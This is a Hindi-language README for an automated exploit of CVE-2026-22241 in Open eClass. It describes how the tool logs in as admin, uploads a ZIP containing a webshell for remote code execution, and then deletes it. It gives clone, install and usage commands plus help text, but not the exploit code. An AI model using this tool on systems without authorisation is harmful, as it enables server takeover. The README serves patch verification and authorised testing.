
CVE-2026-22241 के लिए स्वचालित एक्सप्लॉइट, Open eClass में एक असीमित फ़ाइल अपलोड भेद्यता, जो स्वचालित सफाई के साथ वेबशेल के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाती है।
यह एक्सप्लॉइट CVE-2026-22241 का उपयोग करके लॉगिन, ZIP निर्माण, अपलोड प्रक्रिया को स्वचालित करता है और सर्वर पर सीधे वेबशेल प्रदान करता है तथा एक्सप्लॉइट पूरा होने के बाद इसे स्वचालित रूप से हटा देता है।
Open eClass (संस्करण 4.2 से पहले) की थीम आयात कार्यक्षमता में एक असीमित फ़ाइल अपलोड भेद्यता (Unrestricted File Upload vulnerability) एक हमलावर को प्रशासनिक विशेषाधिकारों के साथ रिमोट कोड निष्पादन (RCE) प्राप्त करने की अनुमति देती है।
भेद्यता विवरण
स्थापना (Installation)
git clone https://github.com/Ashifcoder/CVE-2026-22241.git
cd CVE-2026-22241/
pip install -r requirements.txt
उपयोग (Usage)
python3 CVE-2026-22241.py -t http://127.0.0.1/openeclass -u admin -p adminpassword

विकल्प सहायता (Options Help)
usage: CVE-2026-22241.py [-h] -t ECLASSURL -u USERNAME -p PASSWORD
Open eClass Unrestricted File Upload RCE Exploit [ CVE-2026-22241 ]
Example: CVE-2026-22241.py -t http://127.0.0.1/openeclass -u admin -p adminpassword
options:
-h, --help show this help message and exit
-t ECLASSURL, --eclassUrl ECLASSURL
Target URL of the Open eClass.
-u USERNAME, --username USERNAME
Admin Username for login.
-p PASSWORD, --password PASSWORD
Admin Password for login.
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। इस टूल के दुरुपयोग से होने वाली किसी भी क्षति के लिए लेखक जिम्मेदार नहीं है। इसका उपयोग जिम्मेदारी से और केवल उन्हीं सिस्टम पर करें जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।